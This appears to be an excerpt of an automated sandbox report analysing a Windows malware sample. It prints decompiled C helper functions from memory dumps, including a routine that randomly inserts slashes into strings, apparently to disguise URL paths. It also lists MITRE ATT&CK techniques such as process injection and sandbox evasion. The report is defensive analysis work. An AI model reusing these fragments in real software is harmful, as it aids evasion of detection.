SetEvent.KERNEL32(00000000,?,?,?,03C47D37,?,00000001,?,00000002,?,?,03C4312C,?), ref: 03C498CE
Sleep.KERNEL32(00000BB8,?,?,?,03C47D37,?,00000001,?,00000002,?,?,03C4312C,?), ref: 03C498D9
CloseHandle.KERNEL32(00000000,?,?,?,03C47D37,?,00000001,?,00000002,?,?,03C4312C,?), ref: 03C498E0

Part of subcall function 03C45BC0: WaitForSingleObject.KERNEL32(00000000,?,?,?,03C49900,?,03C49900,?,?,?,?,?,03C49900,?), ref: 03C45C9A

Memory Dump Source

Source File: 00000000.00000002.517980109.0000000003C41000.00000020.00020000.sdmp, Offset: 03C40000, based on PE: true

Associated: 00000000.00000002.517970784.0000000003C40000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.517994997.0000000003C4C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.518001499.0000000003C4D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.518009139.0000000003C4F000.00000002.00020000.sdmp Download File

Similarity

API ID: Event$CloseCreateHandleObjectSingleSleepWait
String ID:
API String ID: 2559942907-0
Opcode ID: ddfd9ea40e6da64f3523f837e66e589bee787028d83e4a8c8ec53d663ad23f3c
Instruction ID: 5394d180e7fb1df4cd1a76a7928e6a703ccf31fab1a86db2ddcc2dce43fc27ca
Opcode Fuzzy Hash: ddfd9ea40e6da64f3523f837e66e589bee787028d83e4a8c8ec53d663ad23f3c
Instruction Fuzzy Hash: D321A777D00229AFCB20FFE58884ADFB7BCAF48210F094425EA55EB104D774DA458791

Uniqueness

Uniqueness Score: -1.00%

Function 03C45F58, Relevance: 6.1, APIs: 4, Instructions: 76
sleepstringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E03C45F58(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t26;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t32;
				void* _t39;
				int _t46;
				intOrPtr* _t47;
				int _t48;

				_t47 = __eax;
				_push( &_v12);
				_push(__eax);
				_t39 = 0;
				_t46 = 0;
				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
				_v8 = _t26;
				if(_t26 < 0) {
					L13:
					return _v8;
				}
				if(_v12 == 0) {
					Sleep(0xc8);
					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
				}
				if(_v8 >= _t39) {
					_t28 = _v12;
					if(_t28 != 0) {
						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
						_v8 = _t31;
						if(_t31 >= 0) {
							_t46 = lstrlenW(_v16);
							if(_t46 != 0) {
								_t46 = _t46 + 1;
								_t48 = _t46 + _t46;
								_t39 = E03C41525(_t48);
								if(_t39 == 0) {
									_v8 = 0x8007000e;
								} else {
									memcpy(_t39, _v16, _t48);
								}
								__imp__#6(_v16);
							}
						}
						_t32 = _v12;
						 *((intOrPtr*)( *_t32 + 8))(_t32);
					}
					 *_a4 = _t39;
					 *_a8 = _t46 + _t46;
				}
				goto L13;
			}

0x03c45f64
0x03c45f68
0x03c45f69
0x03c45f6a
0x03c45f6c
0x03c45f6e
0x03c45f71
0x03c45f76
0x03c4600d
0x03c46014
0x03c46014
0x03c45f7f
0x03c45f86
0x03c45f96
0x03c45f96
0x03c45f9c
0x03c45f9e
0x03c45fa3
0x03c45fac
0x03c45fb2
0x03c45fb7
0x03c45fc2
0x03c45fc6
0x03c45fc8
0x03c45fc9
0x03c45fd2
0x03c45fd6
0x03c45fe7
0x03c45fd8
0x03c45fdd
0x03c45fe2
0x03c45ff1
0x03c45ff1
0x03c45fc6
0x03c45ff7
0x03c45ffd
0x03c45ffd
0x03c46006
0x03c4600b
0x03c4600b
0x00000000

APIs

Sleep.KERNEL32(000000C8), ref: 03C45F86
lstrlenW.KERNEL32(?), ref: 03C45FBC
memcpy.NTDLL(00000000,?,?,?), ref: 03C45FDD
SysFreeString.OLEAUT32(?), ref: 03C45FF1

Memory Dump Source

Source File: 00000000.00000002.517980109.0000000003C41000.00000020.00020000.sdmp, Offset: 03C40000, based on PE: true

Associated: 00000000.00000002.517970784.0000000003C40000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.517994997.0000000003C4C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.518001499.0000000003C4D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.518009139.0000000003C4F000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeSleepStringlstrlenmemcpy
String ID:
API String ID: 1198164300-0
Opcode ID: 99aa99b9e60444992b7fdc1bb8ac12888087544b9224d81ee75e78868d5dc4f1
Instruction ID: 3ea6a521f9a5a9a02d2d048d336a106fbe5241eac4b02afa3b40e02a7e9dbb96
Opcode Fuzzy Hash: 99aa99b9e60444992b7fdc1bb8ac12888087544b9224d81ee75e78868d5dc4f1
Instruction Fuzzy Hash: 78217F79901209FFDB11DFA8D88499EBBB8FF49300F1481A9E945EB214EB31DA00DF61

Uniqueness

Uniqueness Score: -1.00%

Function 03C4A41C, Relevance: 6.1, APIs: 4, Instructions: 61
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E03C4A41C(unsigned int __eax, void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _t21;
				signed short _t23;
				char* _t27;
				void* _t29;
				void* _t30;
				unsigned int _t33;
				void* _t37;
				unsigned int _t38;
				void* _t41;
				void* _t42;
				int _t45;
				void* _t46;

				_t42 = __eax;
				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
				_t38 = __eax;
				_t30 = RtlAllocateHeap( *0x3c4d238, 0, (__eax >> 3) + __eax + 1);
				_v12 = _t30;
				if(_t30 != 0) {
					_v8 = _t42;
					do {
						_t33 = 0x18;
						if(_t38 <= _t33) {
							_t33 = _t38;
						}
						_t21 =  *0x3c4d250; // 0xbd17fe2f
						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
						 *0x3c4d250 = _t23;
						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
						memcpy(_t30, _v8, _t45);
						_v8 = _v8 + _t45;
						_t27 = _t30 + _t45;
						_t38 = _t38 - _t45;
						_t46 = _t46 + 0xc;
						 *_t27 = 0x2f;
						_t13 = _t27 + 1; // 0x1
						_t30 = _t13;
					} while (_t38 > 8);
					memcpy(_t30, _v8, _t38 + 1);
				}
				return _v12;
			}

0x03c4a424
0x03c4a427
0x03c4a42d
0x03c4a445
0x03c4a447
0x03c4a44c
0x03c4a44e
0x03c4a451
0x03c4a453
0x03c4a456
0x03c4a458
0x03c4a458
0x03c4a45a
0x03c4a465
0x03c4a46a
0x03c4a47b
0x03c4a483
0x03c4a488
0x03c4a48b
0x03c4a48e
0x03c4a490
0x03c4a493
0x03c4a496
0x03c4a496
0x03c4a499
0x03c4a4a4
0x03c4a4a9
0x03c4a4b3

APIs

lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,03C47C20,00000000,?,?,03C49DA0,?,047595B0), ref: 03C4A427
RtlAllocateHeap.NTDLL(00000000,?), ref: 03C4A43F
memcpy.NTDLL(00000000,?,-00000008,?,?,?,03C47C20,00000000,?,?,03C49DA0,?,047595B0), ref: 03C4A483
memcpy.NTDLL(00000001,?,00000001), ref: 03C4A4A4

Memory Dump Source

Source File: 00000000.00000002.517980109.0000000003C41000.00000020.00020000.sdmp, Offset: 03C40000, based on PE: true

Associated: 00000000.00000002.517970784.0000000003C40000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.517994997.0000000003C4C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.518001499.0000000003C4D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.518009139.0000000003C4F000.00000002.00020000.sdmp Download File

Similarity

API ID: memcpy$AllocateHeaplstrlen
String ID:
API String ID: 1819133394-0
Opcode ID: 520810d8d2d505d46868bf19e1e4c5ffa2b58bb31c9b840aff5599855ef74194
Instruction ID: c286d7b9b015785aa641ff7602078184eff6d9967c42d319f7e3c02f141bd701
Opcode Fuzzy Hash: 520810d8d2d505d46868bf19e1e4c5ffa2b58bb31c9b840aff5599855ef74194
Instruction Fuzzy Hash: F0112976A00214BFC310DEAAEC88E9EBBBEDBC5361B090276F505DB191E7709E00C760

Uniqueness

Uniqueness Score: -1.00%

Function 01FE19A2, Relevance: 6.0, APIs: 4, Instructions: 40COMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,01FE1BFC), ref: 01FE19B1
GetVersion.KERNEL32(?,01FE1BFC), ref: 01FE19C0
GetCurrentProcessId.KERNEL32(?,01FE1BFC), ref: 01FE19DC
OpenProcess.KERNEL32(0010047A,00000000,00000000,?,01FE1BFC), ref: 01FE19F5

Memory Dump Source

Source File: 00000000.00000002.517164137.0000000001FE0000.00000040.00000001.sdmp, Offset: 01FE0000, based on PE: false

Similarity

API ID: Process$CreateCurrentEventOpenVersion
String ID:
API String ID: 845504543-0
Opcode ID: 239b346ddb4e1af03e74690df84409a47080255b9289a2f171059d4aa852614c
Instruction ID: 645f3ab81b513f678a4d30cdf6472a7414ecfd5853e0a11327bc639d66af5bdd
Opcode Fuzzy Hash: 239b346ddb4e1af03e74690df84409a47080255b9289a2f171059d4aa852614c
Instruction Fuzzy Hash: 67F01D70A45316DBEA119F2A7F1D7953FA9A705712F008036F602F61E4E7B18541CB5D

Uniqueness

Uniqueness Score: -1.00%

Function 03C48C01, Relevance: 6.0, APIs: 4, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E03C48C01(void* __esi) {
				struct _SECURITY_ATTRIBUTES* _v4;
				void* _t8;
				void* _t10;

				_v4 = 0;
				memset(__esi, 0, 0x38);
				_t8 = CreateEventA(0, 1, 0, 0);
				 *(__esi + 0x1c) = _t8;
				if(_t8 != 0) {
					_t10 = CreateEventA(0, 1, 1, 0);
					 *(__esi + 0x20) = _t10;
					if(_t10 == 0) {
						CloseHandle( *(__esi + 0x1c));
					} else {
						_v4 = 1;
					}
				}
				return _v4;
			}

0x03c48c0b
0x03c48c0f
0x03c48c24
0x03c48c26
0x03c48c2b
0x03c48c31
0x03c48c33
0x03c48c38
0x03c48c43
0x03c48c3a
0x03c48c3a
0x03c48c3a
0x03c48c38
0x03c48c51

APIs

memset.NTDLL ref: 03C48C0F
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,751881D0), ref: 03C48C24
CreateEventA.KERNEL32(00000000,00000001,00000001,00000000), ref: 03C48C31
CloseHandle.KERNEL32(?), ref: 03C48C43

Memory Dump Source

Source File: 00000000.00000002.517980109.0000000003C41000.00000020.00020000.sdmp, Offset: 03C40000, based on PE: true

Associated: 00000000.00000002.517970784.0000000003C40000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.517994997.0000000003C4C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.518001499.0000000003C4D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.518009139.0000000003C4F000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateEvent$CloseHandlememset
String ID:
API String ID: 2812548120-0
Opcode ID: 3ec69253eb078d3da6749f185e8af38486565335cda149ff41c8f71942cbcd0c
Instruction ID: d63cce7df90f5045e8022bd2f1b3a1fb004ad11816862d510f8933bbaa02d2b1
Opcode Fuzzy Hash: 3ec69253eb078d3da6749f185e8af38486565335cda149ff41c8f71942cbcd0c
Instruction Fuzzy Hash: 4DF082B510530CBFD324AF26DCC4C2BFBECEB41199B11892EF142C2111C672AC498AA0

Uniqueness

Uniqueness Score: -1.00%

Function 03C44DB1, Relevance: 6.0, APIs: 4, Instructions: 29
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E03C44DB1() {
				void* _t1;
				intOrPtr _t5;
				void* _t6;
				void* _t7;
				void* _t11;

				_t1 =  *0x3c4d26c; // 0x1b8
				if(_t1 == 0) {
					L8:
					return 0;
				}
				SetEvent(_t1);
				_t11 = 0x7fffffff;
				while(1) {
					SleepEx(0x64, 1);
					_t5 =  *0x3c4d2bc; // 0x0
					if(_t5 == 0) {
						break;
					}
					_t11 = _t11 - 0x64;
					if(_t11 > 0) {
						continue;
					}
					break;
				}
				_t6 =  *0x3c4d26c; // 0x1b8
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0x3c4d238; // 0x4360000
				if(_t7 != 0) {
					HeapDestroy(_t7);
				}
				goto L8;
			}

0x03c44db1
0x03c44db8
0x03c44e02
0x03c44e04
0x03c44e04
0x03c44dbc
0x03c44dc2
0x03c44dc7
0x03c44dcb
0x03c44dd1
0x03c44dd8
0x00000000
0x00000000
0x03c44dda
0x03c44ddf
0x00000000
0x00000000
0x00000000
0x03c44ddf
0x03c44de1
0x03c44de9
0x03c44dec
0x03c44dec
0x03c44df2
0x03c44df9
0x03c44dfc
0x03c44dfc
0x00000000

APIs

SetEvent.KERNEL32(000001B8,00000001,03C47F41), ref: 03C44DBC
SleepEx.KERNEL32(00000064,00000001), ref: 03C44DCB
CloseHandle.KERNEL32(000001B8), ref: 03C44DEC
HeapDestroy.KERNEL32(04360000), ref: 03C44DFC

Memory Dump Source

Source File: 00000000.00000002.517980109.0000000003C41000.00000020.00020000.sdmp, Offset: 03C40000, based on PE: true

Associated: 00000000.00000002.517970784.0000000003C40000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.517994997.0000000003C4C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.518001499.0000000003C4D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.518009139.0000000003C4F000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseDestroyEventHandleHeapSleep
String ID:
API String ID: 4109453060-0
Opcode ID: 5adff8a917452050fa872801deb8d86feeaee3bdc1ce3edf479d4ba2cf6c9c87
Instruction ID: 9a7a747d34e32eb9ae36f6122bde3b517329bdba98027198852ea83835d7115c
Opcode Fuzzy Hash: 5adff8a917452050fa872801deb8d86feeaee3bdc1ce3edf479d4ba2cf6c9c87
Instruction Fuzzy Hash: A6F06C7970231197DB34BF36D84CF07BBE8AB047617198210F911DB29ACF60DD40D560

Uniqueness

Uniqueness Score: -1.00%

Function 03C49FF6, Relevance: 6.0, APIs: 4, Instructions: 28
sleepmemoryCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E03C49FF6() {
				void* _v0;
				void** _t3;
				void** _t5;
				void** _t7;
				void** _t8;
				void* _t10;

				_t3 =  *0x3c4d32c; // 0x47595b0
				__imp__( &(_t3[0x10]));
				while(1) {
					_t5 =  *0x3c4d32c; // 0x47595b0
					_t1 =  &(_t5[0x16]); // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t7 =  *0x3c4d32c; // 0x47595b0
				_t10 =  *_t7;
				if(_t10 != 0 && _t10 != 0x3c4e81a) {
					HeapFree( *0x3c4d238, 0, _t10);
					_t7 =  *0x3c4d32c; // 0x47595b0
				}
				 *_t7 = _v0;
				_t8 =  &(_t7[0x10]);
				__imp__(_t8);
				return _t8;
			}

0x03c49ff6
0x03c49fff
0x03c4a00f
0x03c4a00f
0x03c4a014
0x03c4a019
0x00000000
0x00000000
0x03c4a009
0x03c4a009
0x03c4a01b
0x03c4a020
0x03c4a024
0x03c4a037
0x03c4a03d
0x03c4a03d
0x03c4a046
0x03c4a048
0x03c4a04c
0x03c4a052

APIs

RtlEnterCriticalSection.NTDLL(04759570), ref: 03C49FFF
Sleep.KERNEL32(0000000A,?,03C430F3), ref: 03C4A009
HeapFree.KERNEL32(00000000,?,?,03C430F3), ref: 03C4A037
RtlLeaveCriticalSection.NTDLL(04759570), ref: 03C4A04C

Memory Dump Source

Source File: 00000000.00000002.517980109.0000000003C41000.00000020.00020000.sdmp, Offset: 03C40000, based on PE: true

Associated: 00000000.00000002.517970784.0000000003C40000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.517994997.0000000003C4C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.518001499.0000000003C4D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.518009139.0000000003C4F000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID:
API String ID: 58946197-0
Opcode ID: a0538ab15bac0bb8720c9d098baaff0913c7e6b3dc792667f8701fe76400af0e
Instruction ID: 9eafaa3e4408d66df3a2a333e8b24f0181ff0746e2ecdab6fa6e148950ee6da9
Opcode Fuzzy Hash: a0538ab15bac0bb8720c9d098baaff0913c7e6b3dc792667f8701fe76400af0e
Instruction Fuzzy Hash: 25F0D4BC641100AFE728FF65E889F25B7F4AB08740B088048E903CB269D734AC00CA20

Uniqueness

Uniqueness Score: -1.00%

Function 03C48CFA, Relevance: 5.1, APIs: 4, Instructions: 70
stringCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E03C48CFA(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
				intOrPtr* _v8;
				void* _t17;
				intOrPtr* _t22;
				void* _t27;
				char* _t30;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t37;
				void* _t39;
				int _t42;

				_t17 = __eax;
				_t37 = 0;
				__imp__(_a4, _t33, _t36, _t27, __ecx);
				_t2 = _t17 + 1; // 0x1
				_t28 = _t2;
				_t34 = E03C41525(_t2);
				if(_t34 != 0) {
					_t30 = E03C41525(_t28);
					if(_t30 == 0) {
						E03C48B22(_t34);
					} else {
						_t39 = _a4;
						_t22 = E03C4A7C2(_t39);
						_v8 = _t22;
						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
							_a4 = _t39;
						} else {
							_t26 = _t22 + 2;
							_a4 = _t22 + 2;
							_t22 = E03C4A7C2(_t26);
							_v8 = _t22;
						}
						if(_t22 == 0) {
							__imp__(_t34, _a4);
							 *_t30 = 0x2f;
							 *((char*)(_t30 + 1)) = 0;
						} else {
							_t42 = _t22 - _a4;
							memcpy(_t34, _a4, _t42);
							 *((char*)(_t34 + _t42)) = 0;
							__imp__(_t30, _v8);
						}
						 *_a8 = _t34;
						_t37 = 1;
						 *_a12 = _t30;
					}
				}
				return _t37;
			}

0x03c48cfa
0x03c48d04
0x03c48d06
0x03c48d0c
0x03c48d0c
0x03c48d15
0x03c48d19
0x03c48d25
0x03c48d29
0x03c48d9d
0x03c48d2b
0x03c48d2b
0x03c48d2f
0x03c48d34
0x03c48d39
0x03c48d53
0x03c48d42
0x03c48d42
0x03c48d46
0x03c48d49
0x03c48d4e
0x03c48d4e
0x03c48d58
0x03c48d80
0x03c48d86
0x03c48d89
0x03c48d5a
0x03c48d5c
0x03c48d64
0x03c48d6f
0x03c48d74
0x03c48d74
0x03c48d90
0x03c48d97
0x03c48d98
0x03c48d98
0x03c48d29
0x03c48da8

APIs

lstrlen.KERNEL32(00000000,00000008,?,75144D40,?,?,03C49816,?,?,?,?,00000102,03C4937B,?,?,00000000), ref: 03C48D06

Part of subcall function 03C41525: RtlAllocateHeap.NTDLL(00000000,00000000,03C41278), ref: 03C41531

Part of subcall function 03C4A7C2: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,03C48D34,00000000,00000001,00000001,?,?,03C49816,?,?,?,?,00000102), ref: 03C4A7D0
Part of subcall function 03C4A7C2: StrChrA.SHLWAPI(?,0000003F,?,?,03C49816,?,?,?,?,00000102,03C4937B,?,?,00000000,00000000), ref: 03C4A7DA

memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,03C49816,?,?,?,?,00000102,03C4937B,?), ref: 03C48D64
lstrcpy.KERNEL32(00000000,00000000), ref: 03C48D74
lstrcpy.KERNEL32(00000000,00000000), ref: 03C48D80

Memory Dump Source

Source File: 00000000.00000002.517980109.0000000003C41000.00000020.00020000.sdmp, Offset: 03C40000, based on PE: true

Associated: 00000000.00000002.517970784.0000000003C40000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.517994997.0000000003C4C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.518001499.0000000003C4D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.518009139.0000000003C4F000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrcpy$AllocateHeaplstrlenmemcpy
String ID:
API String ID: 3767559652-0
Opcode ID: 8e1b0282d7dccf7e2ba931cd2fb0b9f47fb0f4da46cf5a7c984cc232ed38e75a
Instruction ID: 002aa46da467d916f48fa522d55c384a839d551371f3b913c95caf4888f67301
Opcode Fuzzy Hash: 8e1b0282d7dccf7e2ba931cd2fb0b9f47fb0f4da46cf5a7c984cc232ed38e75a
Instruction Fuzzy Hash: 4D21D27A501316BFCB12EF79CC44AAABFB8AF16290B098051F905DF210DB32CE0097A0

Uniqueness

Uniqueness Score: -1.00%

Function 03C4272D, Relevance: 5.0, APIs: 4, Instructions: 39
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E03C4272D(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				void* _v8;
				void* _t18;
				int _t25;
				int _t29;
				int _t34;

				_t29 = lstrlenW(_a4);
				_t25 = lstrlenW(_a8);
				_t18 = E03C41525(_t25 + _t29 + _t25 + _t29 + 2);
				_v8 = _t18;
				if(_t18 != 0) {
					_t34 = _t29 + _t29;
					memcpy(_t18, _a4, _t34);
					_t10 = _t25 + 2; // 0x2
					memcpy(_v8 + _t34, _a8, _t25 + _t10);
				}
				return _v8;
			}

0x03c42742
0x03c42746
0x03c42750
0x03c42755
0x03c4275a
0x03c4275c
0x03c42764
0x03c42769
0x03c42777
0x03c4277c
0x03c42786

APIs

lstrlenW.KERNEL32(004F0053,?,75145520,00000008,0475935C,?,03C45398,004F0053,0475935C,?,?,?,?,?,?,03C47CCB), ref: 03C4273D
lstrlenW.KERNEL32(03C45398,?,03C45398,004F0053,0475935C,?,?,?,?,?,?,03C47CCB), ref: 03C42744

Part of subcall function 03C41525: RtlAllocateHeap.NTDLL(00000000,00000000,03C41278), ref: 03C41531

memcpy.NTDLL(00000000,004F0053,751469A0,?,?,03C45398,004F0053,0475935C,?,?,?,?,?,?,03C47CCB), ref: 03C42764
memcpy.NTDLL(751469A0,03C45398,00000002,00000000,004F0053,751469A0,?,?,03C45398,004F0053,0475935C), ref: 03C42777

Memory Dump Source

Source File: 00000000.00000002.517980109.0000000003C41000.00000020.00020000.sdmp, Offset: 03C40000, based on PE: true

Associated: 00000000.00000002.517970784.0000000003C40000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.517994997.0000000003C4C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.518001499.0000000003C4D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.518009139.0000000003C4F000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrlenmemcpy$AllocateHeap
String ID:
API String ID: 2411391700-0
Opcode ID: 64cb76085a4154d52dfe11ea9b4b85aadc2c6faf4830febeae2532986b0c01d1
Instruction ID: dbceec41efa8abd7eda9f27cfca45224bb71ab45a601bc19ab2d2f3ecb521ca1
Opcode Fuzzy Hash: 64cb76085a4154d52dfe11ea9b4b85aadc2c6faf4830febeae2532986b0c01d1
Instruction Fuzzy Hash: 03F04936900118BBCF11EFA9DC84CDF7BADEF092947058062FD04DB201EB35EA109BA0

Uniqueness

Uniqueness Score: -1.00%

Function 03C4A677, Relevance: 5.0, APIs: 4, Instructions: 27stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(04759BF8,00000000,00000000,74ECC740,03C49DCB,00000000), ref: 03C4A687
lstrlen.KERNEL32(?), ref: 03C4A68F

Part of subcall function 03C41525: RtlAllocateHeap.NTDLL(00000000,00000000,03C41278), ref: 03C41531

lstrcpy.KERNEL32(00000000,04759BF8), ref: 03C4A6A3
lstrcat.KERNEL32(00000000,?), ref: 03C4A6AE

Memory Dump Source

Source File: 00000000.00000002.517980109.0000000003C41000.00000020.00020000.sdmp, Offset: 03C40000, based on PE: true

Associated: 00000000.00000002.517970784.0000000003C40000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.517994997.0000000003C4C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.518001499.0000000003C4D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.518009139.0000000003C4F000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrlen$AllocateHeaplstrcatlstrcpy
String ID:
API String ID: 74227042-0
Opcode ID: 68810e7ff3ab26df966ab5f098d8b0ada266d937c5f6ff4d97c231ec0e124426
Instruction ID: 998e18439a9d6b42575dbea7f7b668e165fd35d46c02238e6a92213598d95f21
Opcode Fuzzy Hash: 68810e7ff3ab26df966ab5f098d8b0ada266d937c5f6ff4d97c231ec0e124426
Instruction Fuzzy Hash: 7EE09237902621678711BFE4AC4CD9FBFACEF996513084416FA00D7124C724DC018BA1

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

